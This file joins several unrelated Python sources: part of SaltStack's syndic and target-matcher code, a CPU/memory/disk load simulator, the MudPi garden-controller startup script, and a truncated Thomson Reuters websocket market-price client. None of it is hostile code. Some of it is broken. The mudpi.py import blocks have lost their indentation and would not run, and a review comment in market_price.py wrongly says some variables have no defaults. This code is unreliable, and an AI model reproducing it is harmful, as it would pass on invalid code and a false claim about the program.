        Thread target to connect to a master

        Loops (honoring the ``dead_until`` back-off) until the connection
        succeeds, then signals ``_has_master``.
        '''
        connected = False
        master_dict = self.master_syndics[master]
        while connected is False:
            # if we marked it as dead, wait a while
            # (FIX: this check/sleep was duplicated, causing a double sleep)
            if master_dict['dead_until'] > time.time():
                time.sleep(master_dict['dead_until'] - time.time())
            connected = self._connect_to_master(master)
            if not connected:
                time.sleep(1)

        self._has_master.set()

    # TODO: do we need all of this?
    def _connect_to_master(self, master):
        '''
        Attempt to connect to master, including back-off for each one

        return boolean of whether you connected or not
        '''
        log.debug('Syndic attempting to connect to {0}'.format(master))
        if master not in self.master_syndics:
            log.error('Unable to connect to {0}, not in the list of masters'.format(master))
            return False
        minion = self.master_syndics[master]
        try:
            t_minion = Syndic(minion['opts'],
                              timeout=self.SYNDIC_CONNECT_TIMEOUT,
                              safe=False,
                              )

            self.master_syndics[master]['syndic'] = t_minion
            self.master_syndics[master]['generator'] = t_minion.tune_in_no_block()
            # reset back-off state on success
            self.master_syndics[master]['auth_wait'] = self.opts['acceptance_wait_time']
            self.master_syndics[master]['dead_until'] = 0

            log.info('Syndic successfully connected to {0}'.format(master))
            return True
        except SaltClientError:
            log.error('Error while bringing up minion for multi-syndic. Is master {0} responding?'.format(master))
            # re-use auth-wait as backoff for syndic
            minion['dead_until'] = time.time() + minion['auth_wait']
            if minion['auth_wait'] < self.opts['acceptance_wait_time_max']:
                minion['auth_wait'] += self.opts['acceptance_wait_time']
        return False

    # TODO: Move to an async framework of some type-- channel (the event thing underneath)
    # doesn't handle failures well, and will retry 3 times at 60s timeouts-- which all block
    # the main thread's execution. For now we just cause failures to kick off threads to look
    # for the master to come back up
    def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
        '''
        Wrapper to call a given func on a syndic, best effort to get the one you asked for
        '''
        if kwargs is None:
            kwargs = {}
        for master, syndic_dict in self.iter_master_options(master_id):
            if 'syndic' not in syndic_dict:
                continue
            if syndic_dict['dead_until'] > time.time():
                log.error('Unable to call {0} on {1}, that syndic is dead for now'.format(func, master))
                continue
            try:
                ret = getattr(syndic_dict['syndic'], func)(*args, **kwargs)
                if ret is not False:
                    log.debug('{0} called on {1}'.format(func, master))
                    return
            except (SaltClientError, SaltReqTimeoutError):
                pass
            # Either the call raised or returned False: try the next master
            log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
            # If the connection is dead, lets have another thread wait for it to come back
            self._init_master_conn(master)
            continue
        log.critical('Unable to call {0} on any masters!'.format(func))

    def iter_master_options(self, master_id=None):
        '''
        Iterate (in order) over your options for master

        The preferred ``master_id`` (if known) is yielded first, then the
        remaining masters in random order.
        '''
        masters = list(self.master_syndics.keys())
        shuffle(masters)
        if master_id not in self.master_syndics:
            master_id = masters.pop(0)
        else:
            masters.remove(master_id)

        while True:
            yield master_id, self.master_syndics[master_id]
            if len(masters) == 0:
                break
            master_id = masters.pop(0)

    def _reset_event_aggregation(self):
        # Clear per-cycle aggregation state
        self.jids = {}
        self.raw_events = []
        self.event_forward_timeout = None

    # Syndic Tune In
    def tune_in(self):
        '''
        Lock onto the publisher. This is the main event loop for the syndic
        '''
        # Instantiate the local client
        self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
        self.local.event.subscribe('')

        log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id']))

        # Share the poller with the event object
        self.poller = self.local.event.poller

        # Make sure to gracefully handle SIGUSR1
        enable_sigusr1_handler()

        loop_interval = int(self.opts['loop_interval'])
        self._reset_event_aggregation()
        while True:
            try:
                # Do all the maths in seconds
                timeout = loop_interval
                if self.event_forward_timeout is not None:
                    timeout = min(timeout,
                                  self.event_forward_timeout - time.time())
                if timeout >= 0:
                    log.trace('Polling timeout: %f', timeout)
                    socks = dict(self.poller.poll(timeout * 1000))
                else:
                    # This shouldn't really happen.
                    # But there's no harm being defensive
                    log.warning('Negative timeout in syndic main loop')
                    socks = {}

                # check all of your master_syndics, have them do their thing
                for master_id, syndic_dict in six.iteritems(self.master_syndics):
                    # if not connected, lets try
                    if 'generator' not in syndic_dict:
                        log.info('Syndic still not connected to {0}'.format(master_id))
                        # if we couldn't connect, lets try later
                        continue
                    next(syndic_dict['generator'])

                # events
                if socks.get(self.local.event.sub) == zmq.POLLIN:
                    self._process_event_socket()

                if (self.event_forward_timeout is not None and
                        self.event_forward_timeout < time.time()):
                    self._forward_events()
            # We don't handle ZMQErrors like the other minions
            # I've put explicit handling around the receive calls
            # in the process_*_socket methods. If we see any other
            # errors they may need some kind of handling so log them
            # for now.
            except Exception:
                log.critical(
                    'An exception occurred while polling the syndic',
                    exc_info=True
                )

    def _process_event_socket(self):
        '''
        Drain and aggregate events from the local event bus, bounded by
        ``syndic_max_event_process_time`` so the main loop is not starved.
        '''
        tout = time.time() + self.opts['syndic_max_event_process_time']
        while tout > time.time():
            try:
                event = self.local.event.get_event_noblock()
            except zmq.ZMQError as e:
                # EAGAIN indicates no more events at the moment
                # EINTR some kind of signal maybe someone trying
                # to get us to quit so escape our timeout
                if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
                    break
                raise

            log.trace('Got event {0}'.format(event['tag']))

            if self.event_forward_timeout is None:
                self.event_forward_timeout = (
                    time.time() + self.opts['syndic_event_forward_timeout']
                )
            tag_parts = event['tag'].split('/')
            if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
                salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
                'return' in event['data']:
                if 'jid' not in event['data']:
                    # Not a job return
                    continue
                if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
                    log.debug('Return received with matching master_id, not forwarding')
                    continue

                jdict = self.jids.setdefault(event['tag'], {})
                if not jdict:
                    # First return for this jid: record its metadata once
                    jdict['__fun__'] = event['data'].get('fun')
                    jdict['__jid__'] = event['data']['jid']
                    jdict['__load__'] = {}
                    fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
                    jdict['__load__'].update(
                        self.mminion.returners[fstr](event['data']['jid'])
                    )
                if 'master_id' in event['data']:
                    # __'s to make sure it doesn't print out on the master cli
                    jdict['__master_id__'] = event['data']['master_id']
                jdict[event['data']['id']] = event['data']['return']
            else:
                # TODO: config to forward these? If so we'll have to keep track of who
                # has seen them
                # if we are the top level masters-- don't forward all the minion events
                if self.syndic_mode == 'sync':
                    # Add generic event aggregation here
                    if 'retcode' not in event['data']:
                        self.raw_events.append(event)

    def _forward_events(self):
        '''
        Forward the aggregated events and job returns to an available
        master (best-effort), then reset the aggregation buffers.
        '''
        log.trace('Forwarding events')
        if self.raw_events:
            self._call_syndic('_fire_master',
                              kwargs={'events': self.raw_events,
                                      'pretag': tagify(self.opts['id'], base='syndic'),
                                      'timeout': self.SYNDIC_EVENT_TIMEOUT,
                                      },
                              )
        for jid, jid_ret in self.jids.items():
            # Route job returns back to the master that published them
            self._call_syndic('_return_pub',
                              args=(jid_ret, '_syndic_return'),
                              kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
                              master_id=jid_ret.get('__master_id__'),
                              )

        self._reset_event_aggregation()
class Matcher(object):
    '''
    Use to return the value for matching calls from the master
    '''
    def __init__(self, opts, functions=None):
        # opts: the minion opts dict (id, grains, pillar, ...)
        # functions: loaded execution modules; lazily created by data_match
        self.opts = opts
        self.functions = functions

    def confirm_top(self, match, data, nodegroups=None):
        '''
        Takes the data passed to a top file environment and determines if the
        data matches this minion
        '''
        matcher = 'compound'
        if not data:
            log.error('Received bad data when setting the match from the top '
                      'file')
            return False
        for item in data:
            if isinstance(item, dict):
                if 'match' in item:
                    matcher = item['match']
        if hasattr(self, matcher + '_match'):
            funcname = '{0}_match'.format(matcher)
            if matcher == 'nodegroup':
                return getattr(self, funcname)(match, nodegroups)
            return getattr(self, funcname)(match)
        else:
            log.error('Attempting to match with unknown matcher: {0}'.format(
                matcher
            ))
            return False

    def glob_match(self, tgt):
        '''
        Returns true if the passed glob matches the id
        '''
        if not isinstance(tgt, six.string_types):
            return False

        return fnmatch.fnmatch(self.opts['id'], tgt)

    def pcre_match(self, tgt):
        '''
        Returns true if the passed pcre regex matches
        '''
        return bool(re.match(tgt, self.opts['id']))

    def list_match(self, tgt):
        '''
        Determines if this host is on the list
        '''
        if isinstance(tgt, six.string_types):
            tgt = tgt.split(',')
        return bool(self.opts['id'] in tgt)

    def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Reads in the grains glob match
        '''
        log.debug('grains target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for grains match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(
            self.opts['grains'], tgt, delimiter=delimiter
        )

    def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Matches a grain based on regex
        '''
        log.debug('grains pcre target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for grains pcre match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(self.opts['grains'], tgt,
                                        delimiter=delimiter, regex_match=True)

    def data_match(self, tgt):
        '''
        Match based on the local data store on the minion
        '''
        if self.functions is None:
            self.functions = salt.loader.minion_mods(self.opts)
        comps = tgt.split(':')
        if len(comps) < 2:
            return False
        val = self.functions['data.getval'](comps[0])
        if val is None:
            # The value is not defined
            return False
        if isinstance(val, list):
            # We are matching a single component to a single list member
            for member in val:
                if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
                    return True
            return False
        if isinstance(val, dict):
            if comps[1] in val:
                return True
            return False
        return bool(fnmatch.fnmatch(
            val,
            comps[1],
        ))

    def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Reads in the pillar glob match
        '''
        log.debug('pillar target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for pillar match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(
            self.opts['pillar'], tgt, delimiter=delimiter
        )

    def pillar_exact_match(self, tgt, delimiter=':'):
        '''
        Reads in the pillar match, no globbing
        '''
        log.debug('pillar target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for pillar match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(self.opts['pillar'],
                                        tgt,
                                        delimiter=delimiter,
                                        exact_match=True)

    def ipcidr_match(self, tgt):
        '''
        Matches based on ip address or CIDR notation
        '''
        num_parts = len(tgt.split('/'))
        if num_parts > 2:
            # Target is not valid CIDR
            return False
        elif num_parts == 2:
            # Target is CIDR
            return salt.utils.network.in_subnet(
                tgt,
                addrs=self.opts['grains'].get('ipv4', [])
            )
        else:
            # Target is an IPv4 address
            import socket
            try:
                socket.inet_aton(tgt)
            except socket.error:
                # Not a valid IPv4 address
                return False
            else:
                return tgt in self.opts['grains'].get('ipv4', [])

    def range_match(self, tgt):
        '''
        Matches based on range cluster
        '''
        if HAS_RANGE:
            range_ = seco.range.Range(self.opts['range_server'])
            try:
                return self.opts['grains']['fqdn'] in range_.expand(tgt)
            except seco.range.RangeException as exc:
                log.debug('Range exception in compound match: {0}'.format(exc))
                return False
        return False

    def compound_match(self, tgt):
        '''
        Runs the compound target check

        NOTE: the assembled boolean expression is evaluated with eval();
        compound targets are only ever supplied by the master.
        '''
        if not isinstance(tgt, six.string_types):
            log.debug('Compound target received that is not a string')
            return False
        ref = {'G': 'grain',
               'P': 'grain_pcre',
               'I': 'pillar',
               'L': 'list',
               'S': 'ipcidr',
               'E': 'pcre'}
        if HAS_RANGE:
            ref['R'] = 'range'
        results = []
        opers = ['and', 'or', 'not', '(', ')']
        tokens = tgt.split()
        for match in tokens:
            # Try to match tokens from the compound target, first by using
            # the 'G, P, I, L, S, E' matcher types, then by hostname glob.
            # The length guard keeps a bare '@' token from raising
            # IndexError; it falls through to the glob matcher instead.
            if '@' in match and len(match) > 1 and match[1] == '@':
                comps = match.split('@')
                matcher = ref.get(comps[0])
                if not matcher:
                    # If an unknown matcher is called at any time, fail out
                    return False
                results.append(
                    str(
                        getattr(self, '{0}_match'.format(matcher))(
                            '@'.join(comps[1:])
                        )
                    )
                )
            elif match in opers:
                # We didn't match a target, so append a boolean operator or
                # subexpression
                if results or match in ['(', ')']:
                    if match == 'not':
                        # Implicit 'and' before a leading 'not'
                        match_suffix = results[-1]
                        if not (match_suffix == 'and' or match_suffix == 'or'):
                            results.append('and')
                    results.append(match)
                else:
                    # seq start with oper, fail
                    if match not in ['(', ')']:
                        return False
            else:
                # The match is not explicitly defined, evaluate it as a glob
                results.append(str(self.glob_match(match)))
        results = ' '.join(results)
        try:
            return eval(results)  # pylint: disable=W0123
        except Exception:
            log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
            return False

    def nodegroup_match(self, tgt, nodegroups):
        '''
        This is a compatibility matcher and is NOT called when using
        nodegroups for remote execution, but is called when the nodegroups
        matcher is used in states
        '''
        if tgt in nodegroups:
            return self.compound_match(
                salt.utils.minions.nodegroup_comp(tgt, nodegroups)
            )
        return False
class ProxyMinion(Minion):
    '''
    This class instantiates a 'proxy' minion--a minion that does not manipulate
    the host it runs on, but instead manipulates a device that cannot run a minion.
    '''
    def __init__(self, opts, timeout=60, safe=True):  # pylint: disable=W0231
        '''
        Pass in the options dict

        NOTE: Minion.__init__ is deliberately NOT called (W0231); this
        constructor re-implements the setup so the proxy module can be
        loaded and the minion id resolved from the proxied device first.
        '''
        self._running = None
        # Warn if ZMQ < 3.2
        if HAS_ZMQ:
            try:
                zmq_version_info = zmq.zmq_version_info()
            except AttributeError:
                # PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
                # using zmq.zmq_version() and build a version info tuple.
                zmq_version_info = tuple(
                    [int(x) for x in zmq.zmq_version().split('.')]
                )
            if zmq_version_info < (3, 2):
                log.warning(
                    'You have a version of ZMQ less than ZMQ 3.2! There are '
                    'known connection keep-alive issues with ZMQ < 3.2 which '
                    'may result in loss of contact with minions. Please '
                    'upgrade your ZMQ!'
                )
        # Late setup the of the opts grains, so we can log from the grains
        # module
        # print opts['proxymodule']
        # Load the proxy transport module named in the config and let the
        # proxied device supply this minion's id.
        fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
        self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
        opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
        opts['id'] = opts['proxyobject'].id(opts)
        opts.update(resolve_dns(opts))
        self.opts = opts
        # Authenticate with the master before compiling pillar, since
        # pillar compilation requires an established session.
        self.authenticate(timeout, safe)
        self.opts['pillar'] = salt.pillar.get_pillar(
            opts,
            opts['grains'],
            opts['id'],
            opts['environment']
        ).compile_pillar()
        self.functions, self.returners, self.function_errors = self._load_modules()
        self.serial = salt.payload.Serial(self.opts)
        self.mod_opts = self._prep_mod_opts()
        self.matcher = Matcher(self.opts, self.functions)
        uid = salt.utils.get_uid(user=opts.get('user', None))
        self.proc_dir = get_proc_dir(opts['cachedir'], uid=uid)
        self.schedule = salt.utils.schedule.Schedule(
            self.opts,
            self.functions,
            self.returners)
        self.grains_cache = self.opts['grains']
        # self._running = True

    def _prep_mod_opts(self):
        '''
        Returns a copy of the opts with key bits stripped out
        '''
        return super(ProxyMinion, self)._prep_mod_opts()

    def _load_modules(self, force_refresh=False, notify=False):
        '''
        Return the functions and the returners loaded up from the loader
        module

        NOTE: the ``notify`` argument is accepted for signature
        compatibility with Minion._load_modules but is not forwarded.
        '''
        return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh)
|
work_simulator.py | '''
Copyright (C) 2021 S[&]T, The Netherlands.
'''
import multiprocessing
import os
import sys
import tempfile
import time
_MB = 2**20
class WorkSimulator:
    '''
    This class is responsible for consuming memory, CPU cycles and disk space.
    It allocates memory and launches additional processes for each next CPU to
    stress.
    '''
    def __init__(self, logger, time, nr_cpu, memory_mb, disk_space_mb,
                 nr_progress_log_messages, tmp_dir=''):
        # NOTE: the parameter name `time` shadows the stdlib `time` module
        # inside this method only; it is the work duration in seconds.
        self._logger = logger
        self._time = time
        self._nr_cpu = int(nr_cpu)
        self._memory_mb = int(memory_mb)
        self._disk_space_mb = disk_space_mb
        self._nr_progress_log_messages = nr_progress_log_messages
        self._tmp_dir = tmp_dir
        self._temp_file_name = None  # set while the temp file exists on disk

    @property
    def temp_file_name(self):
        # For unittest only
        return self._temp_file_name

    def _create_temp_file(self):
        # Create file of defined size on disk, return file name
        size = self._disk_space_mb * _MB
        if size > 0:
            CHUNK_SIZE = 1 * _MB
            with tempfile.NamedTemporaryFile(prefix='tmp_procsim_', dir=self._tmp_dir, delete=False) as temp:
                # Write random data in 1 MB chunks until `size` bytes written
                while size > 0:
                    amount = min(size, CHUNK_SIZE)
                    temp.write(os.urandom(max(amount, 0)))
                    size -= amount
                self._temp_file_name = temp.name
                temp.close()
            self._logger.debug('Created temp file {} of {} MB'.format(temp.name, self._disk_space_mb))

    def _remove_temp_file(self):
        # Delete the file created by _create_temp_file, if any
        if self._temp_file_name is not None:
            os.remove(self._temp_file_name)
            self._logger.debug('Removed temp file {}'.format(self._temp_file_name))
            self._temp_file_name = None

    def _allocate_memory(self):
        # TODO: Subtract current memory usage? That might be 20..100 MB!
        self.memory_block = None
        if self._memory_mb > 0:
            try:
                self.memory_block = bytearray(self._memory_mb * _MB)
            except MemoryError:
                self._logger.error('Out of memory allocating {} MB'.format(self._memory_mb))
            self._logger.debug('Allocated {} MB of RAM'.format(sys.getsizeof(self.memory_block) // _MB))

    def _free_memory(self):
        # Drop the reference so the block can be garbage collected
        self.memory_block = None

    def _eat_cpu_cycles(self):
        # Busy-loop in this process, plus (nr_cpu - 1) child processes.
        def do_work(step, nr_log_messages):
            # NOTE: `nr_steps` is read from the enclosing scope; it is
            # assigned below before do_work is first called.
            for progress in range(0, 100, step):
                if nr_log_messages > 0:
                    self._logger.progress('Working, progress {}%'.format(progress))
                now = time.time()
                # Spin until this step's share of the total time elapses
                while now + self._time / nr_steps > time.time():
                    x = 2
                    # for n in range(25):
                    #     x = x * x

        if self._time > 0:
            self._logger.debug('Start processing on {} cores'.format(self._nr_cpu))
            nr_steps = max(self._nr_progress_log_messages, 1)
            step = int(100 / nr_steps)
            procs = []
            # Child processes do silent work; only this process logs progress
            for n in range(self._nr_cpu - 1):
                proc = multiprocessing.Process(target=do_work, args=(step, 0))
                procs.append(proc)
                proc.start()
            do_work(step, self._nr_progress_log_messages)
            for proc in procs:
                proc.join()

    def start(self):
        '''Blocks until done'''
        self._create_temp_file()
        self._allocate_memory()
        self._eat_cpu_cycles()
        self._free_memory()
        self._remove_temp_file()
if __name__ == '__main__':
    # Minimal stand-in for the project logger so the simulator can be run
    # directly from the command line.
    class LoggerStub():
        def debug(self, *args, **kwargs):
            print(*args, **kwargs)

        def progress(self, *args, **kwargs):
            print(*args, **kwargs)

        def error(self, *args, **kwargs):
            print(*args, **kwargs)

    # Demo parameters: duration (s), RAM (MB), cores, disk (MB)
    t = 10
    memory_mb = 512
    nr_cpu = multiprocessing.cpu_count()
    disk_mb = 10
    print("Run for {} seconds, use {} MB RAM, {} MB disk and {} cpu cores".format(t, memory_mb, disk_mb, nr_cpu))
    logger = LoggerStub()
    sim = WorkSimulator(logger, t, nr_cpu, memory_mb, disk_mb, 5)
    sim.start()
|
mudpi.py | import RPi.GPIO as GPIO
import threading
import datetime
import socket
import time
import json
import sys
sys.path.append('..')
from action import Action
from config_load import loadConfigJson
from server.mudpi_server import MudpiServer
from workers.lcd_worker import LCDWorker
from workers.relay_worker import RelayWorker
from workers.camera_worker import CameraWorker
from workers.trigger_worker import TriggerWorker
from workers.pi_sensor_worker import PiSensorWorker
from workers.pi_control_worker import PiControlWorker
try:
# Does this prevent the need to install the module if you dont use it?
from workers.arduino_worker import ArduinoWorker
NANPY_ENABLED = True
except ImportError:
NANPY_ENABLED = False
try:
# Does this prevent the need to install the module if you dont use it?
from workers.adc_worker import ADCMCP3008Worker
MCP_ENABLED = True
except ImportError:
MCP_ENABLED = False
import variables
# __ __ _ _____ _
#| \/ | | | __ (_)
#| \ / |_ _ __| | |__) |
#| |\/| | | | |/ _` | ___/ |
#| | | | |_| | (_| | | | |
#|_| |_|\__,_|\__,_|_| |_|
# https://mudpi.app
# MudPi startup: load config, spin up worker threads (camera, sensors,
# controls, relays, nodes, triggers, server), then block until shutdown.
CONFIGS = {}
PROGRAM_RUNNING = True
print(chr(27) + "[2J")
print('Loading MudPi Configs...\r', end="", flush=True)
#load the configuration
CONFIGS = loadConfigJson()
#Waiting for redis and services to be running
time.sleep(5)
print('Loading MudPi Configs...\t\033[1;32m Complete\033[0;0m')
time.sleep(1)
#Clear the console if its open for debugging
print(chr(27) + "[2J")
#Print a display logo for startup
print("\033[1;32m")
print(' __ __ _ _____ _ ')
print('| \/ | | | __ (_)')
print('| \ / |_ _ __| | |__) | ')
print('| |\/| | | | |/ _` | ___/ | ')
print('| | | | |_| | (_| | | | | ')
print('|_| |_|\__,_|\__,_|_| |_| ')
print('_________________________________________________')
print('')
print('Eric Davisson @theDavisson')
print('Version: ', CONFIGS.get('version', '0.8.6'))
print('\033[0;0m')

if CONFIGS['debug'] is True:
    print('\033[1;33mDEBUG MODE ENABLED\033[0;0m')
    print("Loaded Config\n--------------------")
    for index, config in CONFIGS.items():
        if config != '':
            print('%s: %s' % (index, config))
    time.sleep(10)

try:
    print('Initializing Garden Control \r', end="", flush=True)
    GPIO.setwarnings(False)
    GPIO.setmode(GPIO.BCM)
    GPIO.cleanup()
    #Pause for GPIO to finish
    time.sleep(0.1)
    print('Initializing Garden Control...\t\t\033[1;32m Complete\033[0;0m')
    print('Preparing Threads for Workers\r', end="", flush=True)

    # Shared state for all workers
    threads = []
    actions = {}
    relays = []
    relayEvents = {}
    relay_index = 0
    variables.lcd_message = {'line_1': 'Mudpi Control', 'line_2': 'Is Now Running'}
    new_messages_waiting = threading.Event() #Event to signal LCD to pull new messages
    main_thread_running = threading.Event() #Event to signal workers to close
    system_ready = threading.Event() #Event to tell workers to begin working
    camera_available = threading.Event() #Event to signal if camera can be used
    main_thread_running.set() #Main event to tell workers to run/shutdown
    time.sleep(0.1)
    print('Preparing Threads for Workers...\t\033[1;32m Complete\033[0;0m')

    #l = LCDWorker(new_messages_waiting,main_thread_running,system_ready)
    #print('Loading LCD Worker')
    #l = l.run()
    #threads.append(l)

    # Worker for Camera
    try:
        c = CameraWorker(CONFIGS['camera'], main_thread_running, system_ready, camera_available)
        print('Loading Pi Camera Worker')
        c = c.run()
        threads.append(c)
        camera_available.set()
    except KeyError:
        # No 'camera' section in the config
        print('No Camera Found to Load')

    # Workers for pi (Sensors, Controls, Relays)
    try:
        for worker in CONFIGS['workers']:
            # Create worker for worker
            if worker['type'] == "sensor":
                pw = PiSensorWorker(worker, main_thread_running, system_ready)
                print('Loading Pi Sensor Worker...')
            elif worker['type'] == "control":
                pw = PiControlWorker(worker, main_thread_running, system_ready)
                print('Loading Pi Control Worker...')
            elif worker['type'] == "relay":
                # Add Relay Worker Here for Better Config Control
                print('Loading Pi Relay Worker...')
            else:
                raise Exception("Unknown Worker Type: " + worker['type'])
            pw = pw.run()
            if pw is not None:
                threads.append(pw)
    except KeyError:
        print('No Pi Workers Found to Load or Invalid Type')

    # Worker for relays attached to pi
    try:
        for relay in CONFIGS['relays']:
            #Create a threading event for each relay to check status
            relayState = {
                "available": threading.Event(), #Event to allow relay to activate
                "active": threading.Event() #Event to signal relay to open/close
            }
            #Store the relays under the key or index if no key is found, this way we can reference the right relays
            relayEvents[relay.get("key", relay_index)] = relayState
            #Create sensor worker for a relay
            r = RelayWorker(relay, main_thread_running, system_ready, relayState['available'], relayState['active'])
            r = r.run()
            #Make the relays available, this event is toggled off elsewhere if we need to disable relays
            relayState['available'].set()
            relay_index +=1
            if r is not None:
                threads.append(r)
    except KeyError:
        print('No Relays Found to Load')

    # Worker for nodes attached to pi via serial or wifi[esp8266]
    # Supported nodes: arduinos, esp8266, ADC-MCP3xxx, probably others
    try:
        for node in CONFIGS['nodes']:
            # Create worker for node
            if node['type'] == "arduino":
                if NANPY_ENABLED:
                    t = ArduinoWorker(node, main_thread_running, system_ready)
                else:
                    print('Error Loading Nanpy library. Did you pip3 install -r requirements.txt?')
            elif node['type'] == "ADC-MCP3008":
                if MCP_ENABLED:
                    t = ADCMCP3008Worker(node, main_thread_running, system_ready)
                else:
                    print('Error Loading MCP3xxx library. Did you pip3 install -r requirements.txt;?')
            else:
                raise Exception("Unknown Node Type: " + node['type'])
            t = t.run()
            if t is not None:
                threads.append(t)
    except KeyError:
        print('Invalid or no Nodes found to Load')

    # Load in Actions
    try:
        for action in CONFIGS["actions"]:
            a = Action(action)
            a.init_action()
            actions[a.key] = a
    except KeyError:
        print('No Actions Found to Load')

    # Worker for Triggers
    try:
        t = TriggerWorker(CONFIGS['triggers'], main_thread_running, system_ready, actions)
        print('Loading Triggers...')
        t = t.run()
        threads.append(t)
    except KeyError:
        print('No Triggers Found to Load')

    #Decided not to build server worker (this is replaced with nodejs, expressjs)
    #Maybe use this for internal communication across devices if using wireless
    def server_worker():
        # Runs in its own thread; blocks in listen() until shutdown
        server.listen()

    print('MudPi Server...\t\t\t\t\033[1;33m Starting\033[0;0m', end='\r', flush=True)
    time.sleep(1)
    server = MudpiServer(main_thread_running, CONFIGS['server']['host'], CONFIGS['server']['port'])
    s = threading.Thread(target=server_worker)
    threads.append(s)
    s.start()

    time.sleep(.5)
    print('MudPi Garden Control...\t\t\t\033[1;32m Online\033[0;0m')
    print('_________________________________________________')
    system_ready.set() #Workers will not process until system is ready
    variables.r.set('started_at', str(datetime.datetime.now())) #Store current time to track uptime
    system_message = {'event':'SystemStarted', 'data':1}
    variables.r.publish('mudpi', json.dumps(system_message))

    #Hold the program here until its time to graceful shutdown
    #This is our pump cycle check, Using redis to determine if pump should activate
    while PROGRAM_RUNNING:
        # Main program loop
        # add logging or other system operations here...
        time.sleep(0.1)

except KeyboardInterrupt:
    PROGRAM_RUNNING = False
finally:
    print('MudPi Shutting Down...')
    #Perform any cleanup tasks here...

    #load a client on the server to clear it from waiting
    # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    #sock.connect((CONFIGS['SERVER_HOST'], int(CONFIGS['SERVER_PORT'])))
    server.sock.shutdown(socket.SHUT_RDWR)
    # time.sleep(1)
    # sock.close()

    #Clear main running event to signal threads to close
    main_thread_running.clear()
    #Shutdown the camera loop
    camera_available.clear()

    #Join all our threads for shutdown
    for thread in threads:
        thread.join()
    print("MudPi Shutting Down...\t\t\t\033[1;32m Complete\033[0;0m")
    print("Mudpi is Now...\t\t\t\t\033[1;31m Offline\033[0;0m")
|
market_price.py | #|-----------------------------------------------------------------------------
#| This source code is provided under the Apache 2.0 license --
#| and is provided AS IS with no warranty or guarantee of fit for purpose. --
#| See the project's LICENSE.md for details. --
#| Copyright Thomson Reuters 2017. All rights reserved. --
#|-----------------------------------------------------------------------------
#!/usr/bin/env python
""" Simple example of outputting Market Price JSON data using Websockets """
import sys
import time
import getopt
import socket
import json
import websocket
import threading
from threading import Thread, Event
# Global Default Variables (overridable via command-line flags in __main__)
hostname = '127.0.0.1'
port = '15000'
user = 'root'
app_id = '256'
# Local IP address, reported to the server in the login request
position = socket.gethostbyname(socket.gethostname())

# Global Variables
web_socket_app = None  # WebSocketApp instance, created in __main__
web_socket_open = False  # connection state, toggled by on_open/on_close
def process_message(ws, message_json):
    """ Parse at high level and output JSON of message """
    msg_type = message_json['Type']

    if msg_type == "Refresh":
        # Only Login refreshes trigger the follow-up item request
        domain = message_json.get('Domain')
        if domain == "Login":
            process_login_response(ws, message_json)
    elif msg_type == "Ping":
        # Answer server keep-alive pings immediately
        reply = {'Type': 'Pong'}
        ws.send(json.dumps(reply))
        print("SENT:")
        print(json.dumps(reply, sort_keys=True, indent=2, separators=(',', ':')))
def process_login_response(ws, message_json):
    """ Send item request """
    # Login accepted: immediately subscribe to the market price item
    send_market_price_request(ws)
def send_market_price_request(ws):
    """ Create and send simple Market Price request """
    request = {
        'ID': 2,
        'Key': {
            'Name': 'TRI.N',
        },
    }
    ws.send(json.dumps(request))
    print("SENT:")
    print(json.dumps(request, sort_keys=True, indent=2, separators=(',', ':')))
def send_login_request(ws):
    """ Generate a login request from command line data (or defaults) and send """
    # Build the login message in one literal from the module-level settings
    login_json = {
        'ID': 1,
        'Domain': 'Login',
        'Key': {
            'Name': user,
            'Elements': {
                'ApplicationId': app_id,
                'Position': position
            }
        }
    }
    ws.send(json.dumps(login_json))
    print("SENT:")
    print(json.dumps(login_json, sort_keys=True, indent=2, separators=(',', ':')))
def on_message(ws, message):
    """ Called when message received, parse message into JSON for processing """
    print("RECEIVED: ")
    parsed = json.loads(message)
    print(json.dumps(parsed, sort_keys=True, indent=2, separators=(',', ':')))
    # The server delivers a JSON array; handle each message individually
    for single_msg in parsed:
        process_message(ws, single_msg)
def on_error(ws, error):
    """ Called when websocket error has occurred """
    # Just surface the error to stdout; run_forever keeps the app alive
    print(error)
def on_close(ws):
    """ Called when websocket is closed """
    global web_socket_open
    # Record the connection state before reporting
    web_socket_open = False
    print("WebSocket Closed")
def on_open(ws):
    """Websocket callback: handshake done — mark the socket open and log in."""
    global web_socket_open
    web_socket_open = True
    print("WebSocket successfully connected!")
    # The Login request must be the first message on a fresh connection.
    send_login_request(ws)
if __name__ == "__main__":
    # Parse command line parameters (all optional).
    # NOTE(review): `hostname`, `port` and `user` are not defaulted in this
    # excerpt; if no defaults exist above, omitting the corresponding flags
    # raises NameError below — confirm the defaults are defined earlier.
    try:
        opts, args = getopt.getopt(sys.argv[1:], "", ["help", "hostname=", "port=", "app_id=", "user=", "position="])
    except getopt.GetoptError:
